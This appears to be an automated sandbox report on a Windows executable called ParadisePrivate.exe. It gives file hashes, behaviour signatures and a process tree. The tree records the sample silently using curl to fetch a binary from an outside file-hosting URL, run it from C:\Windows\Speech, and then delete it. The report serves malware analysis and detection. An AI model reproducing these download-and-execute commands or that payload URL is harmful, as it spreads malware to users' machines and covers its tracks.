Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    10-12-2024 11:31

General

  • Target

    ParadisePrivate.exe

  • Size

    855KB

  • MD5

    df367e723dc5759cdad30841910cd6af

  • SHA1

    eb6105e8f2462746108e94543e684c8d6a587dbb

  • SHA256

    a29663d874e5fba50215d6966591407d6c9d264371ec0e726bdf5a902cf11156

  • SHA512

    21f29b03a607ba8e3910ed27e802cf61db82dda0c1f3e9772127509dfd9eb7e81778463f47cbe4727116792eed83e11b91dc7fb72e455eb3b621201f9853dbb0

  • SSDEEP

    12288:KvGAa5J2tubG6rOH7Fso6veRSN2ff+zOe9egX7AlGXynGnIr9BqiXb1FP:KvGAMAubGeo60OegX7AoXyn6m7Vj

Score
6/10

Malware Config

Signatures

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ParadisePrivate.exe
    "C:\Users\Admin\AppData\Local\Temp\ParadisePrivate.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:1192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
        2⤵
          PID:2940
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
          2⤵
            PID:2804
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
            2⤵
              PID:2192

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads